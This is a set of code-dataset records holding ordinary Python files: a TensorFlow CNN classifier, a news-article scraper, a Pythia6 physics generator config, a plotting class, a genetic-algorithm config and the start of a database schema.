output\n\n\ndef max_pool_layer_1d(layer, pooling_size, name=None, stride=-1):\n # Set stride equals to pooling size unless specified\n if stride == -1:\n stride = pooling_size\n return tf.keras.layers.MaxPool1D(pooling_size, stride, padding=\"same\")(layer)\n\n\n# Default stride of 1, padding:same\ndef cnn_2d(layer,\n conv_filter_size, # [Scalar]\n num_filters, # [Scalar]\n activation=tf.nn.relu,\n stride=1,\n padding='valid',\n name='',\n kernel_regularizer=0.0): # Stride of CNN\n # We shall define the weights that will be trained using create_weights function.\n layer = tf.keras.layers.Conv1D(num_filters, kernel_size=conv_filter_size, strides=stride, padding=padding,\n activation=activation,\n kernel_regularizer=tf.keras.regularizers.l2(kernel_regularizer))(layer)\n\n # cnn_sum = tf.summary.histogram(name+'_activation',layer)\n return layer\n\n\ndef flatten_layer(layer): # Flatten from 2D/3D to 1D (not count batch dimension)\n layer = tf.keras.layers.Flatten()(layer)\n return layer\n\n\ndef fc_layer(inp, #\n num_outputs,\n mode,\n activation=tf.nn.relu,\n name='',\n kernel_regularizer=0.0):\n # Let's define trainable weights and biases.\n layer = tf.keras.layers.Dense(num_outputs, activation=activation, kernel_initializer=initilizer,\n kernel_regularizer=tf.keras.regularizers.l2(kernel_regularizer))\n output = layer(inp)\n return output\n\n\ndef avg_pool_layer(layer, pooling_size, name=None, stride=-1):\n # Set stride equals to pooling size unless specified\n if stride == -1:\n stride = pooling_size\n return tf.keras.layers.AveragePooling2D(pooling_size, stride, padding=\"same\")(layer)\n\n\ndef max_pool_layer(layer, pooling_size, name=None, stride=-1):\n # Set stride equals to pooling size unless specified\n if stride == -1:\n stride = pooling_size\n return tf.keras.layers.MaxPooling2D(pooling_size, stride, padding=\"same\")(layer)\n\n\ndef max_and_cnn_layer(layer, pl_size, num_filters, activation, name):\n pool = tf.keras.layers.MaxPooling2D(pl_size, strides=pl_size, padding=\"same\")(layer)\n conv = tf.keras.layers.Conv2D(num_filters, pl_size, strides=pl_size, padding=\"same\",\n activation=activation)(layer)\n concat = tf.keras.layers.concatenate([pool, conv], 3)\n return concat\n\n\nl2_regularizer = 0.001\n\n\n# Using max pooling\ndef model_cnn_1d(features, mode, params, config):\n # print(features)\n require_channel = 2\n params['dropout_rate'] = 0.3\n assert len(params['channels']) == require_channel, \\\n \"This model need {} channels input, current input: {}\".format(require_channel, params['channels'])\n # Input size:300x8\n '''\n This model is based on \"A Comparison of 1-D and 2-D Deep Convolutional Neural Networks in ECG Classification\"\n '''\n # (1) Filter size: 7x32, max pooling of k3 s2\n conv1 = cnn_1d(features['image'], 7, params['channels'][0] * 16,\n mode=mode,\n activation=params['activation'],\n name=\"conv1\",\n input_shape=(300, 8),\n kernel_regularizer=l2_regularizer)\n conv1 = tf.layers.batch_normalization(conv1)\n pool1 = max_pool_layer_1d(conv1, 3, name=\"pool1\", stride=2)\n # Output: 294x32 -> 147x32\n # (2) Filter size: 5x64, max pooling of k3 s2\n conv2 = cnn_1d(pool1, 5, params['channels'][0] * 32,\n mode=mode,\n activation=params['activation'], name=\"conv2\",\n kernel_regularizer=l2_regularizer)\n conv2 = tf.layers.batch_normalization(conv2)\n pool2 = max_pool_layer_1d(conv2, 3, \"pool2\", stride=2)\n # Output: 143x64 -> 71x64\n\n # (3) Filter size: 3x128 (3 times), max pooling of k3 s2\n conv3 = cnn_1d(pool2, 3, params['channels'][0] * 64,\n 
mode=mode,\n activation=params['activation'], name=\"conv3\",\n kernel_regularizer=l2_regularizer)\n conv3 = tf.layers.batch_normalization(conv3)\n conv4 = cnn_1d(conv3, 3, params['channels'][0] * 64,\n mode=mode,\n activation=params['activation'], name=\"conv4\",\n kernel_regularizer=l2_regularizer)\n conv4 = tf.layers.batch_normalization(conv4)\n conv5 = cnn_1d(conv4, 3, params['channels'][0] * 64,\n mode=mode,\n activation=params['activation'], name=\"conv5\",\n kernel_regularizer=l2_regularizer)\n conv5 = tf.layers.batch_normalization(conv5)\n pool5 = max_pool_layer_1d(conv5, 3, \"pool2\", stride=2)\n # Output: 65x128 -> 32x128 = 4096\n fc6 = flatten_layer(pool5)\n fc6 = fc_layer(fc6, params['channels'][1] * 128, # 1024\n mode=mode,\n activation=params['activation'], kernel_regularizer=l2_regularizer,\n name='fc6', )\n dropout6 = tf.keras.layers.Dropout(rate=params['dropout_rate'])(fc6)\n # Output: 4096 -> 4096 -> 3\n fc7 = fc_layer(dropout6, params['channels'][1] * 64, # 1024\n mode=mode,\n activation=params['activation'], name='fc7',\n kernel_regularizer=l2_regularizer)\n dropout7 = tf.keras.layers.Dropout(rate=params['dropout_rate'])(fc7)\n logits = fc_layer(dropout7, 3,\n mode=mode,\n activation=None, name='predict', kernel_regularizer=l2_regularizer)\n return logits\n\n\ndef model_deep_sleep_net(features, mode, params, config):\n # print(features)\n require_channel = 2\n params['dropout_rate'] = 0.3\n assert len(params['channels']) == require_channel, \\\n \"This model need {} channels input, current input: {}\".format(require_channel, params['channels'])\n lstm_unit = 128\n init = tf.initializers.truncated_normal(stddev=0.1)\n regularizer = tf.nn.l2_loss\n conv1 = cnn_1d(features['image'], 5, params['channels'][0] * 16,\n mode=mode,\n activation=params['activation'],\n name=\"conv1\",\n input_shape=(300, 8),\n kernel_regularizer=l2_regularizer)\n conv2 = cnn_1d(conv1, 5, params['channels'][0] * 16,\n mode=mode,\n activation=params['activation'], name=\"conv2\",\n kernel_regularizer=l2_regularizer)\n conv3 = cnn_1d(conv2, 5, params['channels'][0] * 16,\n mode=mode,\n activation=params['activation'], name=\"conv3\",\n kernel_regularizer=l2_regularizer)\n pool3 = max_pool_layer_1d(conv3, 2, name=\"pool3\", stride=-1)\n pool3 = tf.layers.batch_normalization(pool3)\n\n conv4 = cnn_1d(pool3, 5, params['channels'][0] * 32,\n mode=mode,\n activation=params['activation'], name=\"conv4\",\n kernel_regularizer=l2_regularizer)\n conv5 = cnn_1d(conv4, 5, params['channels'][0] * 32,\n mode=mode,\n activation=params['activation'], name=\"conv5\",\n kernel_regularizer=l2_regularizer)\n conv6 = cnn_1d(conv5, 5, params['channels'][0] * 32,\n mode=mode,\n activation=params['activation'], name=\"conv6\",\n kernel_regularizer=l2_regularizer)\n pool6 = max_pool_layer_1d(conv6, 2, name=\"pool6\", stride=-1)\n pool6 = tf.layers.batch_normalization(pool6)\n\n conv7 = cnn_1d(pool6, 5, params['channels'][0] * 64,\n mode=mode,\n activation=params['activation'], name=\"conv7\",\n kernel_regularizer=l2_regularizer)\n conv8 = cnn_1d(conv7, 5, params['channels'][0] * 64,\n mode=mode,\n activation=params['activation'], name=\"conv8\",\n kernel_regularizer=l2_regularizer)\n conv9 = cnn_1d(conv8, 5, params['channels'][0] * 64,\n mode=mode,\n activation=params['activation'], name=\"conv9\",\n kernel_regularizer=l2_regularizer)\n pool9 = max_pool_layer_1d(conv9, 2, name=\"pool6\", stride=-1)\n pool9 = tf.layers.batch_normalization(pool9)\n\n # LSTM network\n cell_1 = tf.keras.layers.LSTMCell(lstm_unit)\n cell_2 = 
tf.keras.layers.LSTMCell(lstm_unit)\n cell_3 = tf.keras.layers.LSTMCell(lstm_unit)\n multicell = tf.nn.rnn_cell.MultiRNNCell([cell_1, cell_2, cell_3])\n\n nn, state = tf.nn.dynamic_rnn(multicell, pool9, dtype=tf.float32)\n nn = tf.transpose(nn, [1, 0, 2])\n nn = tf.gather(nn, int(nn.get_shape()[0]) - 1)\n\n # Dense\n logits = fc_layer(nn, 3,\n mode=mode,\n activation=None, name='predict', kernel_regularizer=l2_regularizer)\n return logits\n\n\ndef softmax_focal_loss(labels_l, logits_l, gamma=2., alpha=4.):\n \"\"\"Focal loss for multi-classification\n https://www.dlology.com/blog/multi-class-classification-with-focal-loss-for-imbalanced-datasets/\n FL(p_t)=-alpha(1-p_t)^{gamma}ln(p_t)\n gradient is d(Fl)/d(p_t) not d(Fl)/d(x) as described in paper\n d(Fl)/d(p_t) * [p_t(1-p_t)] = d(Fl)/d(x)\n Focal Loss for Dense Object Detection\n https://arxiv.org/abs/1708.02002\n\n Arguments:\n labels_l {tensor} -- ground truth labels_l, shape of [batch_size, num_class] <- Integer of class\n logits_l {tensor} -- model's output, shape of [batch_size, num_class] <- Before softmax\n\n Keyword Arguments:\n gamma {float} -- (default: {2.0})\n alpha {float} -- (default: {4.0})\n\n Returns:\n [tensor] -- loss.\n \"\"\"\n\n gamma = float(gamma)\n\n epsilon = 1e-32\n labels_l = tf.one_hot(indices=tf.cast(labels_l, tf.int32), depth=3)\n logits_l = tf.cast(logits_l, tf.float32)\n\n logits_l = tf.nn.softmax(logits_l)\n logits_l = tf.add(logits_l, epsilon) # Add epsilon so log is valid\n ce = tf.multiply(labels_l, -tf.log(logits_l)) # Cross entropy, shape of [batch_size, num_class]\n fl_weight = tf.multiply(labels_l, tf.pow(tf.subtract(1., logits_l), gamma)) # This is focal loss part\n fl = tf.multiply(alpha, tf.multiply(fl_weight, ce)) # Add alpha weight here\n reduced_fl = tf.reduce_max(fl, axis=1)\n return tf.reduce_mean(reduced_fl)\n\n\ndef get_loss_weight(labels): # Calculate loss weight of a single batch\n score_one = tf.reduce_sum(tf.cast(tf.equal(labels, tf.constant(0, dtype=tf.int64)), dtype=tf.float32))\n score_three = tf.reduce_sum(tf.cast(tf.equal(labels, tf.constant(1, dtype=tf.int64)), dtype=tf.float32))\n score_five = tf.reduce_sum(tf.cast(tf.equal(labels, tf.constant(2, dtype=tf.int64)), dtype=tf.float32))\n sum_total = score_one + score_three + score_five\n # Add 1 to all denominator to prevent overflow\n weight = tf.stack(\n [tf.math.divide(sum_total, score_one + 1), tf.math.divide(sum_total, score_three + 1),\n tf.math.divide(sum_total, score_five + 1)],\n axis=0)\n return tf.expand_dims(weight, axis=0)\n\n\ndef custom_l2_reg(loss, lambda_=0.01):\n # Reference: https://stackoverflow.com/questions/55029716/how-to-regularize-loss-function\n ys = tf.reduce_mean(loss)\n l2_norms = [tf.nn.l2_loss(v) for v in tf.compat.v1.trainable_variables()]\n l2_norm = tf.reduce_sum(l2_norms)\n loss = ys + lambda_ * l2_norm\n return loss, lambda_ * l2_norm\n\n\n# Define Model\ndef my_model(features, labels, mode, params, config):\n # features['image'] = features['image']*100 # Since the difference is too small\n params['activation'] = tf.nn.leaky_relu\n # Input: (Batch_size,300,8)\n logits = model_cnn_1d(features, mode, params, config)\n # Predict Mode\n predicted_class = tf.argmax(logits, 1)\n if mode == tf.estimator.ModeKeys.PREDICT:\n predictions = {\n 'score': predicted_class[:, tf.newaxis],\n 'probabilities': tf.nn.softmax(logits),\n 'logits': logits\n }\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n labels = (labels - 1) / 2 # Convert score from 1,3,5 to 0,1,2\n one_hot_label = 
tf.one_hot(indices=tf.cast(labels, tf.int32), depth=3)\n labels = tf.cast(labels, tf.int64)\n\n # Create loss weight to help imbalance dataset between each class\n # clamp_val = 5 # Max loss weight cannot be more than 5 times of min value\n # if max(params['loss_weight']) / min(params['loss_weight']) > clamp_val:\n # params['loss_weight'][params['loss_weight'].index(max(params['loss_weight']))] = clamp_val * min(\n # params['loss_weight'])\n # weight = tf.constant([[params['loss_weight'][0], params['loss_weight'][1], params['loss_weight'][2]]],\n # dtype=tf.float32)\n\n # Use loss weight based on each batch\n if mode == tf.estimator.ModeKeys.TRAIN:\n loss_weight_raw = get_loss_weight(labels)\n loss_weight = tf.matmul(one_hot_label, loss_weight_raw, transpose_b=True, a_is_sparse=True)\n else:\n loss_weight = 1.0\n # Cross-entropy loss\n loss = tf.compat.v1.losses.sparse_softmax_cross_entropy(labels, logits,\n weights=loss_weight) # labels is int of class, logits is vector\n loss, reg_loss = custom_l2_reg(loss, lambda_=0.01)\n\n # Focal loss\n # loss = softmax_focal_loss(labels, logits, gamma=0., alpha=loss_weight)\n\n accuracy = tf.compat.v1.metrics.accuracy(labels, predicted_class)\n num_classes = 3\n pos_indices = [0, 1, 2]\n average = 'macro'\n precision = tf_metrics.precision(\n labels, predicted_class, num_classes, pos_indices, average=average)\n recall = tf_metrics.recall(\n labels, predicted_class, num_classes, pos_indices, average=average)\n accuracy = tf_metrics.precision(\n labels, predicted_class, num_classes, pos_indices, average=\"micro\")\n my_accuracy = tf.reduce_mean(tf.cast(tf.equal(labels, predicted_class), dtype=tf.float32))\n acc = tf.compat.v1.summary.scalar(\"accuracy_manual\", my_accuracy) # Number of correct answer\n\n # Create parameters to show in Tensorboard\n tf.compat.v1.summary.scalar(\"Prediction Output\", predicted_class[0])\n tf.compat.v1.summary.scalar(\"Mean Ground Truth\", tf.reduce_mean(tf.cast(labels, tf.float32)))\n d_vars = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.TRAINABLE_VARIABLES)\n # print(\"d_vars\", d_vars)\n # global_step = tf.summary.scalar(\"Global steps\",tf.train.get_global_step())\n\n trainable_variable_name = [v.name for v in tf.compat.v1.trainable_variables()]\n\n # tf.summary for all weight and bias\n summary_weight = []\n for i, t in enumerate(trainable_variable_name):\n summary_weight.append(tf.compat.v1.summary.histogram(t, tf.compat.v1.trainable_variables()[i]))\n current_step = tf.compat.v1.train.get_global_step()\n\n # Train Mode\n if mode == tf.estimator.ModeKeys.TRAIN:\n learning_rate = tf.compat.v1.train.exponential_decay(params['learning_rate'], current_step,\n 20000, 0.96, staircase=True)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n loss_gradient = [optimizer.compute_gradients(loss, tf.trainable_variables()[\n trainable_variable_name.index('dense_1/kernel:0')]),\n optimizer.compute_gradients(loss, tf.trainable_variables()[\n trainable_variable_name.index('conv1/kernel:0')])]\n train_op = optimizer.minimize(loss, global_step=current_step)\n\n save_steps = 1000\n saver_hook = tf.compat.v1.train.SummarySaverHook(save_steps=save_steps, summary_op=tf.compat.v1.summary.merge_all(),\n output_dir=config.model_dir)\n print_input_hook = PrintValueHook(features['image'], \"Input value\", current_step, save_steps)\n print_input_name_hook = PrintValueHook(features['name'], \"Input name\", current_step, save_steps)\n print_logits_hook = PrintValueHook(tf.nn.softmax(logits), \"Training logits\", 
current_step,\n save_steps)\n print_label_hook = PrintValueHook(labels, \"Labels\", current_step, save_steps)\n print_lr_hook = PrintValueHook(learning_rate, \"Learning rate\", current_step, save_steps)\n print_loss_hook = PrintValueHook(loss, \"Total Loss\", current_step, save_steps)\n print_reg_loss_hook = PrintValueHook(reg_loss, \"Regularization Loss\", current_step, save_steps)\n\n print_weight_balance_hook = PrintValueHook(loss_weight_raw, \"Loss weight\", current_step,\n save_steps)\n print_lg_hook = PrintValueHook(loss_gradient[0][0][0][0, 0:16], \"FC6 Loss gradient\", current_step,\n save_steps)\n print_lg2_hook = PrintValueHook(loss_gradient[0][0][1][0, 0:16], \"FC6 Variable\", current_step,\n save_steps)\n print_lg3_hook = PrintValueHook(loss_gradient[1][0][0][0, 0, :], \"Conv1 Loss gradient\",\n current_step,\n save_steps)\n print_lg4_hook = PrintValueHook(loss_gradient[1][0][1][0, 0, :], \"Conv1 Variable\", current_step,\n save_steps)\n # Setting logging parameters\n train_hooks = [print_input_hook, print_input_name_hook,\n saver_hook, print_logits_hook, print_label_hook,\n print_lr_hook,\n print_loss_hook, print_reg_loss_hook,\n print_weight_balance_hook,\n # print_lg_hook, print_lg2_hook,\n # print_lg3_hook, print_lg4_hook,\n ]\n\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op,\n training_hooks=train_hooks)\n\n # Evaluate Mode\n print(\"Evaluation Mode\")\n eval_save_steps = 10\n # Create result(.csv) file, if not exist\n # If change any header here, don't forget to change data in EvalResultHook (custom_hook.py)\n if not os.path.isfile(params['result_path']):\n with open(os.path.join(params['result_path'], params['result_file_name']), \"w\") as csvfile:\n fieldnames = ['Name', 'Label', 'Predicted Class', 'Confident level', 'All confident level']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n # Create hooks\n if params['result_file_name'] == 'train_result.csv':\n saver_hook = tf.train.SummarySaverHook(save_steps=eval_save_steps, summary_op=tf.summary.merge_all(),\n output_dir=os.path.join(config.model_dir, 'train_final'))\n else:\n saver_hook = tf.train.SummarySaverHook(save_steps=eval_save_steps, summary_op=tf.summary.merge_all(),\n output_dir=os.path.join(config.model_dir, 'eval'))\n tensorboard_hook = tf.train.SummarySaverHook(save_steps=eval_save_steps, summary_op=tf.summary.merge_all(),\n output_dir=config.model_dir)\n csv_name = tf.convert_to_tensor(os.path.join(params['result_path'], params['result_file_name']), dtype=tf.string)\n print_result_hook = EvalResultHook(features['name'], labels, predicted_class, tf.nn.softmax(logits), csv_name)\n print_logits_hook = PrintValueHook(tf.nn.softmax(logits), \"Validation Training logits\", current_step,\n 0)\n print_label_hook = PrintValueHook(labels, \"Validation Labels\", current_step, 0)\n\n eval_hooks = [saver_hook, tensorboard_hook, print_result_hook,\n # print_logits_hook, print_label_hook,\n ]\n metrics = {\n 'accuracy': accuracy,\n 'precision': precision, 'recall': recall,\n }\n for metric_name, metric in metrics.items():\n tf.summary.scalar(metric_name, metric[1])\n\n return tf.estimator.EstimatorSpec(mode=mode, eval_metric_ops=metrics,\n loss=loss, evaluation_hooks=eval_hooks)\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":21693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"305363321","text":"import newspaper\nfrom datetime import datetime\nfrom datetime 
import timedelta\nfrom typing import List\nfrom pprint import pprint\nfrom newspaper import news_pool\nfrom config import SITE_URLS\nfrom config import DEBUG\nfrom config import THREADS_PER_SOURCE\n\n\ndef get_articles(paper: newspaper.source.Source) -> List[List[str]]:\n\n print(paper.url, 'total articles:', paper.size())\n\n articles = []\n\n for article in paper.articles:\n\n article.parse()\n\n # Filter articles published in the last two days\n if (article.publish_date and\n article.publish_date.replace(tzinfo=None) >\n (datetime.today() - timedelta(days=2))):\n\n article_data = [\n article.title,\n article.publish_date.strftime('%m/%d/%Y %H:%M'),\n ', '.join(article.authors),\n article.text,\n article.url\n ]\n\n if DEBUG:\n print('Adding article:')\n pprint(article_data)\n\n articles.append(article_data)\n\n return articles\n\n\ndef main() -> List[List[str]]:\n papers = [newspaper.build(url,\n memoize_articles=False,\n fetch_images=False,\n verbose=DEBUG)\n for url in SITE_URLS]\n news_pool.set(papers, threads_per_source=THREADS_PER_SOURCE)\n news_pool.join()\n\n articles = []\n\n for paper in papers:\n articles.extend(get_articles(paper))\n\n print('Final number of articles:', len(articles))\n\n return articles\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"534993262","text":"import FWCore.ParameterSet.Config as cms\n\ngenerator = cms.EDFilter(\"Pythia6GeneratorFilter\",\n pythiaPylistVerbosity = cms.untracked.int32(0),\n filterEfficiency = cms.untracked.double(1.0),\n pythiaHepMCVerbosity = cms.untracked.bool(False),\n comEnergy = cms.double(8000.0),\n maxEventsToPrint = cms.untracked.int32(0),\n PythiaParameters = cms.PSet(\n pythiaUESettings = cms.vstring(\n 'MSTJ(11)=3 ! Choice of the fragmentation function', \n 'MSTJ(22)=2 ! Decay those unstable particles', \n 'PARJ(71)=10 . ! for which ctau 10 mm', \n 'MSTP(2)=1 ! which order running alphaS', \n 'MSTP(33)=0 ! no K factors in hard cross sections', \n 'MSTP(51)=10042 ! structure function chosen (external PDF CTEQ6L1)', \n 'MSTP(52)=2 ! work with LHAPDF', \n 'MSTP(81)=1 ! multiple parton interactions 1 is Pythia default', \n 'MSTP(82)=4 ! Defines the multi-parton model', \n 'MSTU(21)=1 ! Check on possible errors during program execution', \n 'PARP(82)=1.8387 ! pt cutoff for multiparton interactions', \n 'PARP(89)=1960. ! sqrts for which PARP82 is set', \n 'PARP(83)=0.5 ! Multiple interactions: matter distrbn parameter', \n 'PARP(84)=0.4 ! Multiple interactions: matter distribution parameter', \n 'PARP(90)=0.16 ! Multiple interactions: rescaling power', \n 'PARP(67)=2.5 ! amount of initial-state radiation', \n 'PARP(85)=1.0 ! gluon prod. mechanism in MI', \n 'PARP(86)=1.0 ! gluon prod. mechanism in MI', \n 'PARP(62)=1.25 ! ', \n 'PARP(64)=0.2 ! ', \n 'MSTP(91)=1 !', \n 'PARP(91)=2.1 ! kt distribution', \n 'PARP(93)=15.0 ! '),\n processParameters = cms.vstring(\n 'MSEL = 0 ! User defined processes', \n 'MSUB(81) = 1 ! qqbar to QQbar', \n 'MSUB(82) = 1 ! gg to QQbar', \n 'MSTP(7) = 6 ! flavour = top', \n 'PMAS(6,1) = 172.5 ! top quark mass', \n 'MWID(37)=2', \n 'PMAS(37,1) = 120 ! charged Higgs mass ', \n 'MDME(41,1) = 0 ! t decay into g t', \n 'MDME(42,1) = 0 ! t decay into gamma t', \n 'MDME(43,1) = 0 ! t decay into Z0 t', \n 'MDME(44,1) = 0 ! t decay into W d', \n 'MDME(45,1) = 0 ! t decay into W s', \n 'MDME(46,1) = 3 ! 
t decay into W and b ', \n            'MDME(47,1) = 0    ! t decay into W b` ', \n            'MDME(48,1) = 0    ! t decay into h0 t', \n            'MDME(49,1) = 2    ! t decay into H and b ', \n            'MDME(50,1) = 0    ! t decay into ~chi_10 ~t_1', \n            'MDME(51,1) = 0    ! t decay into ~chi_20 ~t_1', \n            'MDME(52,1) = 0    ! t decay into ~chi_30 ~t_1', \n            'MDME(53,1) = 0    ! t decay into ~chi_40 ~t_1', \n            'MDME(54,1) = 0    ! t decay into ~g ~t_1', \n            'MDME(55,1) = 0    ! t decay into ~Gravitino ~t_1',\n            # Switch off / on desirable channels for W-\n            'MDME(190,1) = 0',\n            'MDME(191,1) = 0',\n            'MDME(192,1) = 0',\n            'MDME(193,1) = 0',\n            'MDME(194,1) = 0',\n            'MDME(195,1) = 0',\n            'MDME(196,1) = 0',\n            'MDME(197,1) = 0',\n            'MDME(198,1) = 0',\n            'MDME(199,1) = 0',\n            'MDME(200,1) = 0',\n            'MDME(206,1) = 1    ! W decay into e nu',\n            'MDME(207,1) = 1    ! W decay into mu nu',\n            'MDME(208,1) = 0'),\n        parameterSets = cms.vstring('pythiaUESettings', \n            'processParameters', \n            'PYUPDAParameters'),\n        PYUPDAParameters = cms.vstring(\"PYUPDAFILE = \\'Configuration/Generator/data/Pythia_H+120_cbbar_pyupda.in\\' \")\n    )\n)\n","sub_path":"genfragments/EightTeV/TTbar_HBWB_M-120_pythia6_cff.py","file_name":"TTbar_HBWB_M-120_pythia6_cff.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"560284084","text":"from matplotlib import pylab\nfrom .PlotInfo import *\nfrom .Bar import *\nimport sys\n\n\nclass StackedBars(PlotInfo):\n    \"\"\"\n    A stacked bar chart consisting of multiple series of bars with the \n    same X axis values\n    \"\"\"\n\n    def __init__(self):\n        PlotInfo.__init__(self, \"stacked bar\")\n\n        self.bars = []\n        self.spacing = 0\n        self.width = 0.8\n\n    def add(self, bar):\n        if not isinstance(bar, Bar):\n            print(\"Can only add Bars to a StackedBars\", file=sys.stderr)\n            sys.exit(1)\n\n        self.bars.append(bar)\n\n    def getXLabelLocations(self):\n        if len(self.bars) == 0:\n            return []\n        else:\n            numBarVals = len(self.bars[0].xValues)\n            return [i + self.width / 2.0 for i in range(numBarVals)]\n\n    def draw(self, axis):\n        self.xTickLabelPoints = self.getXLabelLocations()\n\n        PlotInfo.draw(self, axis)\n\n        plotHandles = []\n        plotLabels = []\n\n        if len(self.bars) == 0:\n            return [plotHandles, plotLabels]\n\n        numBars = len(self.bars)\n\n        bottoms = [0 for i in range(len(self.xTickLabelPoints))]\n\n        xVals = [i + i * self.spacing \\\n                     for i in range(len(self.bars[0].xValues))]\n\n        for bar in self.bars:\n            attrs = bar.getAttributes()\n            currHandle = axis.bar(xVals, bar.yValues, bottom=bottoms, **attrs)\n\n            bottoms = [bar.yValues[i] + bottoms[i] \\\n                           for i in range(len(self.xTickLabelPoints))]\n\n            plotHandles.append(currHandle[0])\n            plotLabels.append(bar.label)\n        return [plotHandles, plotLabels]\n","sub_path":"sofastats/boomslang/StackedBars.py","file_name":"StackedBars.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"176611354","text":"from os import getenv\nfrom math import floor\n\n# Genetic Algorithm params\n\nDEFAULT_CXPB_MUTPB = (0.2, 0.8, False)  # (crossover rate, mutation rate, VAR_AND / VAR_OR)\n\nSELECTION_METHOD = 'rank'  # ['tournament', 'rank']\nRANK_SELECTION_PRESSURE = 1.7  # Range: [1.1, 2.0]\nTOURNAMENT_SIZE = 2\n\nCROSSOVER_COOLING_RATE = 1.0\nMUTATION_COOLING_RATE = 1.0\n\n# Island Model\n\nNUM_ISLANDS = int(getenv('SPE_NUM_ISLANDS', 3))\nTOTAL_GENERATIONS = 50000\nMIGRATION_INTERVAL = 50\nISLAND_POPULATION = 200\nMIGRATION_RATIO = 0.1\nISLAND_ELITE_SIZE = floor(ISLAND_POPULATION * 
0.05)\nLAMBDA = floor(ISLAND_POPULATION / 0.8) # denominator must be 1 or smaller\nMIGRATION_SCHEME = 'round_robin' # ['fixed', 'round_robin']\n\n# Logging\nLOGGER_ENVIRONMENT = 'local' # ['aws', 'azure', 'local']\nHALL_OF_FAME_HYPOTHESES = 1\nHALL_OF_FAME_DEBUG_INTERVAL = 50\nDUMP_ALL_POPULATION_EVERY_N_GENERATIONS = float(\"inf\")\nPROCESS_NAME_PREFIX = 'island'\nLOG_NAME_PREFIX = 'genetic_log'\nLOG_DEBUG_NAME_PREFIX = 'genetic_log_debug'\nUPLOAD_ISLAND_RECORD_TO_S3_EVERY_N_GENERATIONS = 100\nUPLOAD_LOG_TO_S3_EVERY_N_LINES = 1000\n\n# Incest prevention\n\nPREVENT_INCEST = False\nINCEST_THRESHOLD = 300\n\n# Crossover\n\nCROSSOVER_BOTH_HMM_AND_RULES = False\nCROSSOVER_HMM_WEIGHT = 1 # Weights for HMM/Rules crossover (in case CROSSOVER_BOTH_HMM_AND_RULES is False)\nCROSSOVER_RULES_WEIGHT = 1\n\n# Mutation\n\nMUTATE_BOTH_HMM_AND_RULES = False\nMAX_MUTATIONS = 1\nRANDOM_HYPOTHESIS_BY_MUTATIONS = False\nRANDOM_INIT_WARMUP_STEPS = 10000\nACCEPT_WORSE_PROBAB = 0.2\nUNPARSABLE_WORD_PENALTY = 1000\nUNPARSABLE_HYPOTHESIS_DISTANCE = 1000000\n\n# Rule set\n\nRULE_SET_CROSSOVER = 'uniform' # ['uniform', 'pivot']\n\n# HMM\n\nHMM_CROSSOVER_FUNCTION = 'emissions' # ['emissions', 'matrix', 'subgraph', 'connected_component']\nLIMIT_CROSSOVER_RESULT_NUM_OF_STATES = True\nMAX_CROSSOVERS = 1\nRANDOM_HMM_MAX_EMISSION_LENGTH = 5\nRANDOM_HMM_MAX_EMISSIONS_PER_STATE = 10\nRANDOM_HMM_METHOD = 'simple' # ['simple', 'matrix']\nHMM_RANDOM_EMISSIONS_BY_DATA = False # HMM random emissions will be substrings of data words\nDEFAULT_HMM_BY_RANDOM_PROBAB = 0.0\nEXPLICIT_HMM_BY_RANDOM_PROBAB = 0.0\nTRANSITION_MATRIX_TRANSITION_PROBABILITY = 0.1\n\n# Custom Genetic Algorithm params\n\nCUSTOM_CXPB_MUTPB_VALUES_PER_ISLAND = [] # Add tuples in form (CXPB, MUTPB, VAR_AND/VAR_OR) to set custom config per island\nCUSTOM_CONFIG_PER_ISLAND = {} # Set simulation configuration fields for specific islands. E.g. 
for island 64: {64: { \"MUTATE_RULE_SET\": 10, \"MUTATE_HMM\": 1 }}\n\n# Misc\n\nPARSER_TYPE = 'openfst' # ['python', 'openfst']\nLIMIT_TRANSDUCER_NUM_OF_STATES = 1000 # grammar transducers with too many states will return energy 'inf'\nCACHE_TYPE = 'none' # ['redis', 'mem', 'none']\nCACHE_RULE_SET_TRANSDUCERS = False\nCLEAR_RULE_SET_CACHE_INTERVAL = 100\n","sub_path":"source/ga_config.py","file_name":"ga_config.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"155482901","text":"import os\nfrom datetime import datetime\nimport json\nfrom collections import namedtuple\n\nimport asyncpg\n\n\nevent_status_t = namedtuple(\n \"event_status_t\", (\"start_time\", \"end_time\", \"results_time\", \"last_collect_time\", \"have_final\")\n)\n\n\nclass DatabaseConnection(object):\n def __init__(self):\n self.connection_url = os.environ.get(\"AS_POSTGRES_DSN\")\n self.pool = None\n\n async def init_models(self):\n self.pool = await asyncpg.create_pool(dsn=self.connection_url)\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"\"\"\n DO $$ BEGIN\n CREATE TYPE tier_type_t AS ENUM ('points', 'voltage');\n EXCEPTION\n WHEN duplicate_object THEN null;\n END $$;\n \n CREATE TABLE IF NOT EXISTS event_v2 (\n serverid varchar(8),\n event_id int,\n event_title text,\n banner text,\n event_type text,\n start_t timestamp,\n end_t timestamp,\n result_t timestamp,\n\n UNIQUE(serverid, event_id)\n );\n CREATE TABLE IF NOT EXISTS event_story_v2 (\n serverid varchar(8),\n event_id int,\n chapter int,\n req_points int,\n banner text,\n title text,\n script_path text,\n\n FOREIGN KEY (serverid, event_id) REFERENCES event_v2(serverid, event_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n );\n CREATE TABLE IF NOT EXISTS border_fixed_data_v3 (\n serverid varchar(8),\n event_id int,\n observation timestamp,\n is_last 